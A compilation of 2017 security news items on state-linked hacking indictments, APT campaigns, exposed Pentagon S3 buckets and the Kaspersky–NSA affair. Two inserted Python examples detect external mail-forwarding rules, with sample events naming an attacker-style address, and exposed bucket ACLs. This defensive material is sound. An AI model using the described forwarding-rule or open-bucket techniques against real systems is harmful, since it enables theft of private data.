SSL tests, conducted by ITIF using Qualys’ SSL Server Test, also showed that some government websites have important vulnerabilities. For example, the Trade Representative (ustr.gov) and National Weather Service (weather.gov) sites are vulnerable to POODLE attacks, and trade.gov and tsunami.gov (Tsunami Warning Centers) are susceptible to DROWN attacks.

As for DNSSEC, the protocol designed to prevent attackers from redirecting users to malicious sites via DNS spoofing, ITIF found that 90% of U.S. government websites have it enabled. Since the previous report, 15 federal sites activated DNSSEC and two deactivated the feature.

“Of the top 100,000 websites reviewed only 70 percent passed both the DNSSEC and SSL test. Several of these top 100,000 websites did not have DNSSEC or HTTPS implemented. One example is the Administrative Office of the U.S. Courts (uscourts.gov), which also scored low in the security category in the initial report,” ITIF said in its report, 2017 Benchmarking U.S. Government Websites.

Shortly after the DHS ordered federal agencies to improve their security, Agari analyzed government websites to see how many had implemented the DMARC anti-email spoofing protocol. In mid-October when the company published its report, nearly 82% of websites lacked DMARC entirely.


U.S. Indicts Chinese For Hacking Siemens, Moody’s
28.11.2017 securityweek BigBrothers
U.S. authorities filed charges Monday against three China-based hackers for stealing sensitive information from U.S.-based companies, including data from Siemens industrial groups, and for accessing a high-profile email account at Moody’s.

Wu Yingzhuo, Dong Hao and Xia Lei, who the Department of Justice (DOJ) says are Chinese nationals and residents of China, were indicted by a grand jury for a series of cyber-attacks against three corporate victims in the financial, engineering and technology industries between 2011 and May 2017.

Victims named in the indictment include Moody’s Analytics, Siemens, and GPS technology firm Trimble.

According to the FBI, the hackers work for Guangzhou Bo Yu Information Technology Company Limited, a firm that purports to be a China-based Internet security firm also known as “Boyusec.”

Tracked as APT3 by FireEye, and Gothic Panda by CrowdStrike, the group is also known as UPS Team, Buckeye and TG-0110, and has previously been linked to the Chinese Ministry of State Security (MSS).

“We’ve tracked their activity back to 2007 and they are one of the most technically advanced state-affiliated actors in China,” Adam Meyers, VP of Intelligence at CrowdStrike, told SecurityWeek. “Their previous targeting includes industries such as Aerospace, Defense, Energy, Technology, NGOs, etc., that are primarily aligned with China’s economic objectives.”

In November 2016, the Washington Free Beacon learned from Pentagon intelligence officials that Boyusec had been working with Chinese telecoms giant Huawei to develop spyware-laden security products that would be loaded onto computers and phones. The unnamed officials said Boyusec was “closely connected” to the Chinese Ministry of State Security.

According to the indictment, the hackers:

• Stole approximately 407 gigabytes of proprietary commercial data pertaining to Siemens’s energy, technology and transportation businesses.

• Accessed the internal email server of Moody’s Analytics and placed a forwarding rule in the email account of a prominent employee, and set it to forward all emails to and from the account to web-based email accounts controlled by the attackers.

• Stole at least 275 megabytes of data, including compressed data, which included hundreds of files that would have assisted a Trimble competitor in developing, providing and marketing a similar product without incurring millions of dollars in research and development costs.
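As an added, defender-side illustration of the Moody’s forwarding-rule technique listed above (example code written for this page, not from the indictment or any vendor product), the check below flags newly created mailbox rules that forward mail to addresses outside the organization; the audit-event field names and the sample events are constructed assumptions:

```python
"""Flag mailbox inbox rules that forward mail outside the organization.

Added example, not code from the indictment or from any vendor product.
The events below are constructed; their field names (operation, user,
rule_name, conditions, forward_to, redirect_to) are assumptions, loosely
modelled on what a mailbox audit trail records when a rule is created.
"""
from dataclasses import dataclass
from typing import Any, Dict, Iterable, List

# The organization's own mail domains; forwarding to these is not flagged.
INTERNAL_DOMAINS = {"example.com", "mail.example.com"}

# Audit operations that create or modify an inbox rule.
RULE_OPERATIONS = {"New-InboxRule", "Set-InboxRule"}


@dataclass
class Finding:
    user: str
    rule_name: str
    external_targets: List[str]
    catch_all: bool      # True when the rule has no conditions, i.e. it matches every message
    severity: str        # "high" for catch-all external forwarding, otherwise "medium"


def _domain(address: str) -> str:
    """Lower-cased domain of an e-mail address ('' if it has no '@')."""
    return address.rsplit("@", 1)[1].lower() if "@" in address else ""


def external_targets(event: Dict[str, Any],
                     internal_domains: Iterable[str] = INTERNAL_DOMAINS) -> List[str]:
    """All forward/redirect recipients whose domain is not one of ours."""
    internal = {d.lower() for d in internal_domains}
    targets = (event.get("forward_to", [])
               + event.get("redirect_to", [])
               + event.get("forward_as_attachment_to", []))
    return [t for t in targets if _domain(t) not in internal]


def is_catch_all(event: Dict[str, Any]) -> bool:
    """A rule with no non-empty condition applies to every message in the mailbox."""
    conditions = event.get("conditions") or {}
    return not any(conditions.values())


def flag_forwarding_rules(events: Iterable[Dict[str, Any]],
                          internal_domains: Iterable[str] = INTERNAL_DOMAINS) -> List[Finding]:
    """Return one Finding per rule-creation/modification event that forwards mail externally."""
    findings: List[Finding] = []
    for ev in events:
        if ev.get("operation") not in RULE_OPERATIONS:
            continue
        targets = external_targets(ev, internal_domains)
        if not targets:
            continue
        catch_all = is_catch_all(ev)
        findings.append(Finding(
            user=ev["user"],
            rule_name=ev.get("rule_name", ""),
            external_targets=targets,
            catch_all=catch_all,
            severity="high" if catch_all else "medium",
        ))
    return findings


# Constructed sample events (not real audit data).
SAMPLE_EVENTS = [
    {"operation": "New-InboxRule", "user": "analyst@example.com",
     "rule_name": "Archive copies", "conditions": {"subject_contains": ["report"]},
     "forward_to": ["analyst.archive@mail.example.com"]},          # internal target: ignored
    {"operation": "New-InboxRule", "user": "executive@example.com",
     "rule_name": "", "conditions": {},                               # no conditions: every message
     "forward_to": ["backup.mailbox77@webmail-provider.example"]},   # external: high severity
    {"operation": "Set-InboxRule", "user": "hr@example.com",
     "rule_name": "Invoices", "conditions": {"from": ["billing@vendor.example"]},
     "redirect_to": ["accounts@vendor.example"]},                    # external but scoped: medium
    {"operation": "Remove-InboxRule", "user": "hr@example.com",
     "rule_name": "Invoices", "forward_to": ["x@evil.example"]},     # not a create/modify op: ignored
]

if __name__ == "__main__":
    for f in flag_forwarding_rules(SAMPLE_EVENTS):
        print(f"{f.severity.upper():6} {f.user:24} rule={f.rule_name!r:12} "
              f"catch_all={f.catch_all} -> {', '.join(f.external_targets)}")
```

A rule with no conditions that forwards to a domain the organization does not own is the exact shape described in the indictment, which is why it gets the highest severity.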

“The primary goal of the co-conspirators’ unauthorized access to victim computers was to search for, identify, copy, package, and steal data from those computers, including confidential business and commercial information, work product, and sensitive victim employee information, such as usernames and passwords that could be used to extend unauthorized access within the victim systems,” the DOJ said. “For the three victim entities listed in the Indictment, such information included hundreds of gigabytes of data regarding the housing finance, energy, technology, transportation, construction, land survey, and agricultural sectors.”

Intrusion Truth previously conducted an analysis of APT3’s command and control (C&C) infrastructure, and analyzed domain registration data. Their research led to two individuals, named Wu Yingzhuo and Dong Hao, who apparently registered many of the domains used by the threat actor.

Researchers noticed last year that the group had shifted its attention from the U.S. and the U.K. to Hong Kong, where it had mainly targeted political entities using a backdoor dubbed “Pirpi.”

CrowdStrike has seen an uptick in activity by the group since 2016, Meyers said.

In addition to Pirpi, Symantec observed APT3 using various other tools, including keyloggers, remote command execution tools, system information harvesting tools, and browser password stealers. Researchers said the group appears to be focusing on file and print servers, which suggests they are mainly interested in stealing documents to support their espionage efforts.

“Defendants Wu, Dong and Xia launched coordinated and targeted cyber intrusions against businesses operating in the United States, including here in the Western District of Pennsylvania, in order to steal confidential business information,” said Acting U.S. Attorney Song. “These conspirators masked their criminal conspiracy by exploiting unwitting computers, called ‘hop points,’ conducting ‘spearphish’ email campaigns to gain unauthorized access to corporate computers, and deploying malicious code to infiltrate the victim computer networks.”


'Advanced' Cyber Attack Targets Saudi Arabia
22.11.2017 securityweek BigBrothers
Saudi authorities said Monday they had detected an "advanced" cyber attack targeting the kingdom, in a fresh attempt by hackers to disrupt government computers.

The government's National Cyber Security Centre said the attack involved the use of "Powershell", but it did not comment on the source of the attack or which government bodies were targeted.

"The NCSC has detected a new Advanced Persistent Threat (APT) that is targeting Saudi Arabia," the agency said in a statement, adding the attack sought to infiltrate computers using email phishing techniques.

Saudi Arabia has come under frequent cyber attacks, including "Shamoon", the aggressive disc-wiping malware employed in attacks against the Saudi energy sector in 2012.

Saudi Aramco, the world's biggest oil company, was among the firms hit by Shamoon, in what is believed to be the country's worst cyber attack yet.

US intelligence officials at the time said they suspected a link to the kingdom's regional rival Iran.


U.S. charges Iranian state-sponsored hacker over ‘Game of Thrones’ HBO hack
22.11.2017 securityaffairs BigBrothers

The US Department of Justice has charged Iranian computer expert Behzad Mesri over the ‘Game of Thrones’ HBO hack; he also previously worked with the Iranian military.
The United States charged the Iranian computer expert Behzad Mesri over the ‘Game of Thrones’ HBO hack. On Tuesday, the man was charged with stealing scripts and plot summaries for ‘Game of Thrones’.

Manhattan US Attorney Joon Kim said Mesri “had previously hacked computer systems for the Iranian military”. The man threatened to release the stolen data unless HBO paid a $6 million ransom in Bitcoin.

“Behzad Mesri, an Iranian national who had previously hacked computer systems for the Iranian military, allegedly infiltrated HBO’s systems, stole proprietary data, including scripts and plot summaries for unaired episodes of Game of Thrones, and then sought to extort HBO of $6 million in Bitcoins.” said U.S. Attorney Joon H. Kim. “Mesri now stands charged with federal crimes, and although not arrested today, he will forever have to look over his shoulder until he is made to face justice. American ingenuity and creativity is to be cultivated and celebrated — not hacked, stolen, and held for ransom. For hackers who test our resolve in protecting our intellectual property — even those hiding behind keyboards in countries far away — eventually, winter will come.”

Behzad Mesri, who is still at large, is an Iran-based hacker who also goes online with the moniker Skote Vahshat.

Mesri faces seven counts in the United States, including wire fraud, aggravated identity theft and four counts of computer fraud.


The DoJ accuses the man of being the mastermind behind the cyber attacks against HBO from May to August; he stole scripts and plot summaries for then-unaired episodes of the “Game of Thrones” series and multiple other shows.

Mesri compromised multiple user accounts belonging to HBO employees and other authorized users; through them he accessed the company’s servers and stole confidential and proprietary information.

“Over the course of several months, MESRI used that unauthorized access to steal confidential and proprietary information belonging to HBO, which he then exfiltrated to servers under his control.” states the press release published by the US Department of Justice.

“Through the course of the intrusions into HBO’s systems, MESRI was responsible for stealing confidential and proprietary data belonging to HBO, including, but not limited to: (a) confidential video files containing unaired episodes of original HBO television programs, including episodes of “Barry,” “Ballers,” “Curb Your Enthusiasm,” “Room 104,” and “The Deuce;” (b) scripts and plot summaries for unaired programming, including but not limited to episodes of “Game of Thrones;”(c) confidential cast and crew contact lists; (d) emails belonging to at least one HBO employee; (e) financial documents; and (f) online credentials for HBO social media accounts (collectively, the “Stolen Data”).”

According to the US prosecutors, Mesri previously conducted computer attacks on behalf of the Iranian military that targeted nuclear software systems and Israeli infrastructure.

Prosecutors confirmed that the Iranian man was a member of the Iran-based Turk Black Hat Security hacking group, which targeted hundreds of websites in the United States and around the world.

“MESRI is an Iran-based computer hacker who had previously worked on behalf of the Iranian military to conduct computer network attacks that targeted military systems, nuclear software systems, and Israeli infrastructure.” continues the DoJ.

“At certain times, MESRI has been a member of an Iran-based hacking group called the Turk Black Hat security team and, as a member of that group, conducted hundreds of website defacements using the online hacker pseudonym “Skote Vahshat” against websites in the United States and elsewhere.”


U.S. Charges Iranian Over 'Game of Thrones' HBO Hack
21.11.2017 securityweek BigBrothers
The United States on Tuesday charged an Iranian computer whiz with hacking into HBO, stealing scripts and plot summaries for "Game of Thrones," and trying to extort $6 million in Bitcoin out of the network.

US prosecutors in New York unveiled a seven-count indictment against Behzad Mesri, whom they identified as an Iran-based hacker who also goes by the name Skote Vahshat. Mesri is still at large, a spokesman for the US Attorney's office in Manhattan told AFP.

Mesri is accused of orchestrating a hack of HBO from May to August, then threatening to release stolen data unless the premium cable network paid a $6 million ransom in the digital currency Bitcoin.

US prosecutors say he stole scripts and plot summaries for then unaired episodes of the global smash hit "Game of Thrones" series, and unaired episodes for multiple other shows, including the "Curb Your Enthusiasm" comedy series.

He is accused of compromising multiple user accounts, and in July of sending an anonymous email to HBO personnel saying: "Hi to All losers! Yes it's true! HBO is hacked!... Beware of heart Attack!!!"

Mesri leaked some of the stolen data over the Internet onto websites he controlled, US federal prosecutors allege.

The Iranian suspect faces seven counts in the United States, including wire fraud, aggravated identity theft and four counts of computer fraud.

US prosecutors accuse Mesri of previously conducting computer attacks on behalf of the Iranian military that targeted nuclear software systems and Israeli infrastructure.

They also said he was a member of the Iran-based Turk Black Hat Security hacking group, which targeted hundreds of websites in the United States and around the world.


North Korean Hackers Target Android Users in South
21.11.2017 securityweek BigBrothers
At least two cybersecurity firms have noticed that the notorious Lazarus threat group, which many experts have linked to North Korea, has been using a new piece of Android malware to target smartphone users in South Korea.

Both McAfee and Palo Alto Networks published blog posts on Monday describing the latest campaign attributed to the threat actor also known as Hidden Cobra. The group is believed to be responsible for several high-profile attacks, including ones targeting Sony and financial institutions, and possibly even the recent WannaCry ransomware attack. Some of the operations tied to this group are Operation Blockbuster, Dark Seoul and Operation Troy.

The malware sample analyzed by McAfee, delivered as an APK file, has been designed to mimic a Korean bible app made available on Google Play by a developer named GODpeople. However, the malicious application did not make it onto the official app store and it’s unclear what method of distribution has been used.

“GodPeople is sympathetic to individuals from North Korea, helping to produce a movie about underground church groups in the North. Previous dealings with the Korean Information Security Agency on discoveries in the Korean peninsula have shown that religious groups are often the target of such activities in Korea,” explained McAfee’s Christiaan Beek and Raj Samani.

McAfee said the malware, which has been around since at least March, delivers a backdoor as an executable and linkable format (ELF) file. The backdoor allows hackers to collect information about the infected device, download and upload files, and execute commands. The list of command and control (C&C) servers used by the malware includes IP addresses previously linked to the Lazarus group.

Palo Alto Networks has not shared any information about the applications used to deliver the malware, but the company pointed out that the operation appears to be aimed at Samsung device users in South Korea.

The firm’s analysis started with a PE file uploaded to VirusTotal. This file is designed to deliver ELF ARM files and APK files from an HTTP server. The APK that represents the final payload provides backdoor capabilities and allows its operator to spy on the targeted user by recording audio via the microphone, capturing images via the camera, uploading and downloading files, harvesting GPS information, reading contacts, collecting SMS and MMS messages, recording browsing history, and capturing Wi-Fi information.

Palo Alto Networks has also found links between the malware and the Lazarus group, particularly to malware and infrastructure used in attacks on the SWIFT banking system and activities described in reports on Operation Blockbuster.

This is not the first time North Korea has reportedly targeted mobile users in the South. Back in 2014, South Korea’s National Intelligence Service said more than 20,000 smartphones had been infected that year with a piece of malware traced back to North Korea.

The reports from McAfee and Palo Alto Networks come less than a week after the U.S. Department of Homeland Security (DHS) published a report on a Hidden Cobra malware tracked as FALLCHILL.


Unprotected Pentagon Database Stored 1.8 Billion Internet Posts
20.11.2017 securityweek BigBrothers
Researchers have found an unprotected database storing 1.8 billion posts collected from social media services, news websites and forums by a contractor for the U.S. Department of Defense.

The data was discovered on September 6 by Chris Vickery, director of risk research at cyber resilience firm UpGuard, inside an AWS S3 storage bucket that was accessible to any user with an AWS account.

Based on the names of the subdomains storing it, the information appears to have been collected for the U.S. Central Command (CENTCOM) and the U.S. Pacific Command (PACOM), unified combatant commands of the Department of Defense.

The exposed records represent comments posted on news websites, forum messages, and posts from social media services such as Facebook, and they cover a wide range of topics, including sports, video games, celebrities and politics. The data had been collected between 2009 and the present day.

While some of the posts appear to be written by American citizens, many of them are in Arabic, Farsi and various dialects spoken in Pakistan and Afghanistan.

“Arabic posts criticizing or mocking ISIS, posted to Facebook pages for Iraqi anti-jihadi groups, or Pashto language comments made on the official Facebook page of Pakistani politician Imran Khan, who has drawn scrutiny from both the Taliban and the US government, give some indication of content that might be of interest to CENTCOM in its prosecution of regional wars and against Islamic extremists,” UpGuard said in a blog post.

The vast amount of information has been set up for searches via Apache Lucene, a high-performance, full-featured text search engine library.

An analysis of the data showed that it was likely collected for the Pentagon by VendorX, a now-defunct private sector contractor. While it had been in operation, the company claimed it was working on Outpost, a “multi-lingual platform designed to positively influence change in high-risk youth in unstable regions of the world.” The project was exclusively run for CENTCOM.

While the exposed data has been collected from public sources, UpGuard believes the incident raises some questions about the privacy and civil liberties impact of the U.S. government’s intelligence operations. The leak also once again highlights the risks associated with third-party vendors.

The Department of Defense has secured the leaky database. The organization told CNN that the information is not collected or processed for any intelligence purposes. A representative of CENTCOM said the data is “used for measurement and engagement activities of our online programs on public sites,” but declined to elaborate.

This is not the first time UpGuard has found an unprotected AWS S3 bucket storing data belonging to a high profile organization. In the past months, the company discovered similar leaks tied to Accenture, the U.S. Republican Party, TigerSwan, Verizon, and the U.S. military.


According to UIDAI, more than 200 government websites made Aadhaar users’ details public
20.11.2017 securityaffairs BigBrothers

According to the Unique Identification Authority of India (UIDAI), Aadhaar details were displayed on 210 government websites.
The state government websites publicly displayed personal details such as names and addresses of Aadhaar users.

The Aadhaar is the world’s largest biometric ID system, with over 1.123 billion enrolled members as of 28 February 2017.

The role of the system is crucial for both authenticating and authorizing transactions and is a pillar of the Indian UID (unique identification database).

The Aadhaar issuing body confirmed that the data was removed from the websites just after the data breach was noticed, but it did not provide further details on the alleged hack.

Even though the UIDAI never made Aadhaar details public, more than 200 websites of central government and state government departments were displaying the list of beneficiaries along with their names, addresses, other details and Aadhaar numbers.

“Though the UIDAI never made Aadhaar details public, 210 websites of central government and state government departments including educational institutes were displaying the list of beneficiaries along with their name, address, other details and Aadhaar numbers of general public.” reported the IndiaToday website.

Aadhaar system
The Aadhaar architecture has been designed to ensure data security and privacy.

“Various policies and procedures have been defined, these are reviewed and updated continually thereby appropriately controlling and monitoring any movement of people, material and data in and out of UIDAI premises, particularly the data centres,” the UIDAI said.

The UIDAI confirmed that security audits are conducted on a regular basis to improve the security and privacy of the data, and it reiterated its efforts to keep the data safe and protected.


Terabytes of US military social media surveillance miserably left wide open in AWS S3 buckets
19.11.2017 securityaffairs BigBrothers

Three AWS S3 buckets containing dozens of terabytes of data from US military surveillance of social media were left wide open online.
It has happened again: three more AWS S3 buckets containing dozens of terabytes of data from US military surveillance of social media were left wide open online.

The misconfigured AWS S3 buckets contain social media posts and similar pages that were scraped from around the world by the US military to identify and profile persons of interest.

The huge trove of documents was discovered by the well-known data breach hunter Chris Vickery; the three buckets were named centcom-backup, centcom-archive, and pacom-archive.

CENTCOM is the abbreviation for the US Central Command, the US military command that covers the Middle East, North Africa and Central Asia; similarly, PACOM stands for the US Pacific Command, which covers South Asia, China and Australasia.

Vickery was conducting a routine scan for the word “COM” in publicly accessible S3 buckets when he spotted the unsecured buckets; one of them contained 1.8 billion social media posts gathered by automated scraping over the past eight years up to today. According to Vickery, it mainly contains postings made in Central Asia, but in many cases also comments made by US individuals.

Documents reveal that the archive was collected as part of the US government’s Outpost program, a social media monitoring and narrowcasting campaign designed to target young people and turn them against terrorism.

The archive discovered by Vickery in fact includes Outpost development and configuration files, as well as Apache Lucene indexes of keywords designed to be used with the open-source search engine Elasticsearch.

“While public information about this firm is scant, an internet search reveals multiple individuals who worked for VendorX describing work building Outpost for CENTCOM and the Defense Department” reads the blog post published by Upguard.


Another folder titled “Coral” likely refers to the US Army’s “Coral Reef” intelligence software.

“This folder contains a directory named “INGEST” that contained all the posts scraped and held in the “centcom-backup” bucket. The Coral Reef program “allows users of intelligence to better understand relationships between persons of interest” as a component of the Distributed Common Ground System-Army (DCGS-A) intelligence suite, “the Army’s primary system for the posting of data, processing of information, and dissemination to all components and echelons of intelligence, surveillance and reconnaissance information about the threats, weather, and terrain” programs. Such a focus on gathering intelligence about “persons of interest” would be even more clear-cut in the other two buckets, starting with “centcom-archive.” continues the post.


The bucket “centcom-archive” contains an impressive volume of internet posts stored in the same XML text file format as seen in “centcom-backup”; at least 1.8 billion such posts are stored there.

“The bucket “centcom-archive” contains more scraped internet posts stored in the same XML text file format as seen in “centcom-backup,” only on a much larger scale: conservatively, at least 1.8 billion such posts are stored here.” states the post.

It is disturbing that this material was exposed online through misconfigured AWS S3 buckets; foreign governments and terrorist organizations may have had the same access to the archive that Vickery did.

Vickery notified the American military about the discovery and the buckets have now been locked down and hidden.

It isn’t the first time that data from the US military has been discovered online: in September, researchers from cybersecurity firm UpGuard discovered that thousands of files containing personal data on former US military, intelligence, and government workers had allegedly been exposed online for months.
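The two UpGuard findings above (the CENTCOM/PACOM buckets here and the 1.8-billion-post database in the earlier item) both come down to a bucket ACL that grants READ to S3’s AuthenticatedUsers group, i.e. anyone with an AWS account. The added example below, which is not UpGuard’s or AWS’s code, classifies ACL documents of the shape boto3’s get_bucket_acl() returns; the grants and the owner ID are invented:

```python
"""Classify S3 bucket ACLs by who outside the owning account can list or write them.

Added example, not UpGuard's or AWS's own tooling. The ACL documents below
are constructed in the shape boto3's get_bucket_acl() returns ("Owner" and
"Grants"); the group URIs are S3's real predefined groups, while the grants
and the owner ID are invented. Nothing here contacts AWS.
"""
from typing import Any, Dict, List, Tuple

# S3 predefined groups that appear as ACL grantees.
ALL_USERS = "http://acs.amazonaws.com/groups/global/AllUsers"                       # anyone, no credentials
AUTHENTICATED_USERS = "http://acs.amazonaws.com/groups/global/AuthenticatedUsers"   # any AWS account at all

# Exposure levels, worst first. "any-aws-account" is the CENTCOM/PACOM case:
# the buckets were readable by anyone who had simply signed up for an AWS account.
PUBLIC, ANY_AWS_ACCOUNT, PRIVATE = "public", "any-aws-account", "private"
EXPOSURE_ORDER = {PUBLIC: 0, ANY_AWS_ACCOUNT: 1, PRIVATE: 2}

# Bucket-level ACL permissions: READ lists the objects, WRITE creates, overwrites or
# deletes them, FULL_CONTROL includes both plus the right to rewrite the ACL itself.
LISTING_PERMS = {"READ", "FULL_CONTROL"}
WRITING_PERMS = {"WRITE", "FULL_CONTROL"}


def group_permissions(acl: Dict[str, Any], group_uri: str) -> List[str]:
    """Permissions the ACL grants to one predefined group (empty list if none)."""
    return [g["Permission"] for g in acl.get("Grants", [])
            if g.get("Grantee", {}).get("Type") == "Group"
            and g["Grantee"].get("URI") == group_uri]


def classify_acl(acl: Dict[str, Any]) -> Dict[str, Any]:
    """Summarize who outside the owning account can reach the bucket and how."""
    public = group_permissions(acl, ALL_USERS)
    any_account = group_permissions(acl, AUTHENTICATED_USERS)
    stranger_perms = set(public) | set(any_account)
    exposure = PUBLIC if public else ANY_AWS_ACCOUNT if any_account else PRIVATE
    return {
        "exposure": exposure,
        "all_users": public,
        "authenticated_users": any_account,
        "listable_by_strangers": bool(stranger_perms & LISTING_PERMS),
        "writable_by_strangers": bool(stranger_perms & WRITING_PERMS),
    }


def find_exposed(buckets: Dict[str, Dict[str, Any]]) -> List[Tuple[str, str]]:
    """(bucket, exposure) for every bucket strangers can reach, worst first."""
    hits = [(name, classify_acl(acl)["exposure"]) for name, acl in buckets.items()]
    hits = [h for h in hits if h[1] != PRIVATE]
    return sorted(hits, key=lambda h: (EXPOSURE_ORDER[h[1]], h[0]))


# Constructed ACLs: the grants are invented, only the first bucket name is from the incident.
OWNER = {"DisplayName": "vendor-account", "ID": "owner-canonical-id-placeholder"}
SAMPLE_BUCKETS = {
    "centcom-backup": {"Owner": OWNER, "Grants": [
        {"Grantee": {"Type": "CanonicalUser", "ID": OWNER["ID"]}, "Permission": "FULL_CONTROL"},
        {"Grantee": {"Type": "Group", "URI": AUTHENTICATED_USERS}, "Permission": "READ"},
    ]},
    "vendor-internal-build": {"Owner": OWNER, "Grants": [
        {"Grantee": {"Type": "CanonicalUser", "ID": OWNER["ID"]}, "Permission": "FULL_CONTROL"},
    ]},
    "static-site-assets": {"Owner": OWNER, "Grants": [
        {"Grantee": {"Type": "CanonicalUser", "ID": OWNER["ID"]}, "Permission": "FULL_CONTROL"},
        {"Grantee": {"Type": "Group", "URI": ALL_USERS}, "Permission": "READ"},
        {"Grantee": {"Type": "Group", "URI": AUTHENTICATED_USERS}, "Permission": "WRITE"},
    ]},
}

if __name__ == "__main__":
    for name, exposure in find_exposed(SAMPLE_BUCKETS):
        print(f"{name:24} {exposure:16} {classify_acl(SAMPLE_BUCKETS[name])}")
```

Against a live account the input would be the dictionary returned by boto3’s `s3.get_bucket_acl(Bucket=name)` for each bucket listed by `list_buckets()`; a bucket policy can open a bucket just as widely, so an ACL check alone is not a complete audit.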


Kaspersky: NSA Worker's Computer Was Already Infected With Malware
17.11.2017 thehackernews BigBrothers

Refuting allegations that its anti-virus product helped Russian spies steal classified files from an NSA employee's laptop, Kaspersky Lab has released more findings that suggest the computer in question may have been infected with malware.
Moscow-based cyber security firm Kaspersky Lab on Thursday published the results of its own internal investigation claiming the NSA worker who took classified documents home had a personal home computer overwhelmed with malware.
According to the latest Kaspersky report, the telemetry data its antivirus collected from the NSA staffer's home computer contained large amounts of malware files which acted as a backdoor to the PC.
The report also provided more details about the malicious backdoor that infected the NSA worker's computer when he installed a pirated version of Microsoft Office 2013 .ISO containing the Mokes backdoor, also known as Smoke Loader.
Backdoor On NSA Worker's PC May Have Helped Other Hackers Steal Classified Documents
This backdoor could have allowed other hackers to steal classified documents and hacking tools belonging to the NSA from the machine of the employee, who worked for the Tailored Access Operations (TAO) group of hackers at the agency.
For those unaware, the United States has banned Kaspersky antivirus software from all of its government computers over suspicion of Kaspersky's involvement with Russian intelligence agencies and spying fears.
Though no substantial evidence is yet available, an article published by the Wall Street Journal (WSJ) last month claimed that Kaspersky Antivirus helped Russian government hackers steal highly classified documents and hacking tools belonging to the NSA in 2015 from a staffer's home PC.
However, the article, which quoted multiple anonymous sources, failed to provide any solid evidence of whether Kaspersky was intentionally involved with the Russian spies or whether hackers simply exploited a zero-day bug in the antivirus product.
Kaspersky stands by its claim that its antivirus software detected and collected the NSA classified files as part of its normal functionality, and has rigorously denied allegations that it passed those documents on to the Russian government.
Now, the recent report published by the anti-virus firm says that between September 11, 2014, and November 17, 2014, Kaspersky Lab servers received confidential NSA materials multiple times from a poorly secured computer located in the United States.
The company's antivirus software, which was installed on the employee's PC, discovered that the files contained malware used by the Equation Group, the NSA's elite hacking group, which had been operating for some 14 years when Kaspersky exposed it in 2015.
Kaspersky Claims it Deleted All NSA Classified Files
Besides confidential material, the software also collected 121 separate malware samples (including a backdoor) which were not related to the Equation Group.
The report also insists that the company deleted all classified documents once one of its analysts realized that the antivirus had collected more than malicious binaries. Also, the company then created a special software tweak, preventing those files from being downloaded again.
"The reason we deleted those files and will delete similar ones in the future is two-fold; we do not need anything other than malware binaries to improve protection of our customers and secondly, because of concerns regarding the handling of potential classified materials," Kaspersky Lab report reads.
"Assuming that the markings were real, such information cannot and will not [be] consumed even to produce detection signatures based on descriptions."
Trojan Discovered on NSA Worker's Computer
The backdoor discovered on the NSA staffer's PC was actually a Trojan, which was later identified as "Smoke Bot" or "Smoke Loader" and allegedly created by a Russian criminal hacker in 2011. It had also been advertised on Russian underground forums.
Interestingly, this Trojan communicated with the command and control servers apparently set up by a Chinese individual going by the name "Zhou Lou," using the e-mail address "zhoulu823@gmail.com."
Since executing the malware would not have been possible with the Kaspersky antivirus enabled, the staffer must have disabled the antivirus software to do so.
"Given that system owner's potential clearance level, the user could have been a prime target of nation states," the Kaspersky report reads.
"Adding the user's apparent need for cracked versions of Windows and Office, poor security practices, and improper handling of what appeared to be classified materials, it is possible that the user could have leaked information to many hands."
More details on the backdoor can be found here.
For now, the Kaspersky anti-virus software has been banned by the U.S. Department of Homeland Security (DHS) from all of its government computers.
In the wake of this incident, Kaspersky Lab has recently launched a new transparency initiative that involves giving partners access to its antivirus source code and paying large bug bounties for security issues discovered in its products.


Who is behind MuddyWater in the Middle East? Likely a politically-motivated actor
17.11.2017 securityaffairs BigBrothers

Researchers are investigating a mysterious wave of attacks in the Middle East that was dubbed MuddyWater due to the confusion in attributing the.
Security experts at Palo Alto Networks are monitoring long-lasting targeted attacks aimed at entities in the Middle East and that are difficult to attribute.

The experts called the campaign ‘MuddyWater’ due to the confusion in attributing these attacks that took place between February and October 2017 targeting entities in Saudi Arabia, Iraq, Israel, United Arab Emirates, Georgia, India, Pakistan, Turkey, and the United States to date.

The threat actors used a PowerShell-based first-stage backdoor named POWERSTATS; over time the hackers changed their tools and techniques.

“This blog discusses targeted attacks against the Middle East taking place between February and October 2017 by a group Unit 42 is naming MuddyWater” states the analysis from PaloAlto Networks.

“MuddyWater attacks are characterized by the use of a slowly evolving PowerShell-based first stage backdoor we call “POWERSTATS”. Despite broad scrutiny and reports on MuddyWater attacks, the activity continues with only incremental changes to the tools and techniques.”

MuddyWater attackers used a set of weaponized documents that were also used in recently observed incidents targeting the Saudi Arabian government. The same set of documents is also similar to ones associated with a series of attacks discovered by experts at Morphisec.

The malicious documents associated with this last wave of attacks had been tailored according to the target regions.

Some of the attacks were attributed to FIN7, which launched a campaign aimed at employees involved in SEC filings.

Palo Alto Networks believes that the recent wave of attacks might have been mistakenly associated with the FIN7 group; it also reported that a C&C server delivering the FIN7-linked DNSMessenger tool was used in MuddyWater attacks as well.

The hackers maintained the same final payload while changing delivery methods between attacks.

“Based on these connections we can be confident that all the files and infrastructure […] are related, since more than one of these can be used to link each of the samples discussed in each case,” Palo Alto notes.

The hackers used well known tools, including Meterpreter, Mimikatz, Lazagne, Invoke-Obfuscation, and more.

In some recent attacks, the threat actor used GitHub to host the POWERSTATS backdoor.

“In some of their recent attack documents, the attackers also used GitHub as a hosting site for their custom backdoor, POWERSTATS.” continues the analysis.

The experts identified a number of GitHub repositories related to the group's malware.

The experts observed compromised accounts at third-party organizations sending the MuddyWater malware; in one case, the attackers sent a malicious document that appears nearly identical to a legitimate attachment which Palo Alto observed later being sent to the same recipient.

“This indicates that the attackers stole and modified a legitimate document from the compromised user account, crafted a malicious decoy Word macro document using this stolen document and sent it to the target recipient who might be expecting the email from the original account user before the real sender had time to send it,” reported PaloAlto.


According to Palo Alto Networks, past attribution of the attacks was wrong: the group is not financially motivated as previously thought, but politically motivated instead.

The threat actors might have planted false flags to make attribution harder.

“Whilst we could conclude with confidence that the attacks discussed in this article are not FIN7 related, we were not able to answer many of our questions about the MuddyWater attacks. We are currently unable to make a firm conclusion about the origin of the attackers, or the specific types of information they seek out once on a network,” the security researchers concluded.


Kaspersky provided further details on NSA Incident. Other APTs targeted the same PC
17.11.2017 securityaffairs BigBrothers

Kaspersky Lab has published a full technical report on the alleged hack of its antivirus software to steal NSA hacking code.
In October, anonymous sources claimed that in 2015 Russian intelligence stole NSA cyber weapons from the PC of one of the agency's employees, which was running Kaspersky antivirus.

